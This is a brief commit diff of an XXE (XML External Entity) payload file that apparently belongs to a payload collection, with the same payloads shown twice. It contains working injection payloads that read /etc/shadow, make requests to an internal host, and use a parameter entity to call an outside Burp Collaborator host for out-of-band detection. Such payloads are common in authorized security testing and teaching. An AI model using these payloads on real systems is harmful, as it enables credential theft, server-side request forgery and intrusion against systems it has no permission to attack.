leveled · January 22, 2021 20:16
diff --git a/basic_xxe_example.xml b/basic_xxe_example.xml
 <!--?xml version="1.0" ?-->
 <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
 <userInfo>
  <firstName>John</firstName>
  <lastName>&ent;</lastName>
 </userInfo>

 <!--External Entity-->
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]> 

 <!--Parameter Entity-->
 <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://wpp4w63vbnnhghjj4zz.burpcollaborator.net"> %xxe; ]>
	<!--?xml version="1.0" ?-->
	<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
	<userInfo>
	<firstName>John</firstName>
	<lastName>&ent;</lastName>
	</userInfo>

	<!--External Entity-->
	<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>

	<!--Parameter Entity-->
	<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://wpp4w63vbnnhghjj4zz.burpcollaborator.net"> %xxe; ]>